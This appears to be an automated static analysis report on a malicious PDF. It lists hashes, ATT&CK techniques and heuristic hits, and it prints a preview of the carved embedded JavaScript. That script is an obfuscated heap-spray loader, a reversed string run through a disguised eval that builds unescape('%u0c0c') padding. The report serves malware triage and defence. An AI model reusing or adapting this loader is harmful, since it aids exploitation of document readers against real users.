Malicious PDF — malware analysis report

Static analysis result for SHA-256 eb0e13f1f4f47ee8…

Verdict: MALICIOUS
File type: PDF
Size: 69.2 KB
First seen: 2026-05-09
MD5: e7b30ae9ba3beed9099a98fd12d32c99
SHA-1: aa2684a44ca0746a9a985ef1446d8c2e34befa36
SHA-256: eb0e13f1f4f47ee8210f468be3ba66e68fd06326f93eed85071b67c7559d3a84
Risk score: 68

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell
T1566.002 Spearphishing Attachment

The PDF contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier strongly flags this PDF as malicious. An embedded JavaScript file, 'javascript_obj0012_000.js', was extracted. The presence of these elements suggests the document is designed to execute malicious code, likely for downloading a secondary payload. The embedded URL 'http://www.bitstream.com' is also noted.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics (4)

  • Suspicious extracted artifact (medium) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action (low, 1 related finding) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://www.bitstream.com (in PDF document text)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0012_000.js | pdf-javascript-stream | PDF /JS object 12 at offset 0x104F0 | 3686 bytes
SHA-256: d3541f8e2467ff8bbaf9e5a0fe8f7c314e4018f3c389a54a2c5f12f6ef690c6a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) ipmet (epak = olygak rav ;epacsenu = epak rav } }	   ]j[lp =+ ipmet  		 esle  	   ;"%" =+ ipmet    	 )"Q" == ]j[lp( fi  	 {   )"P" =! ]j[lp( fi   { )++j;htgnel.lp<j;0=j( rof ;"" = ipmet rav 		;"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" = lp rav ';
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x319 | 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)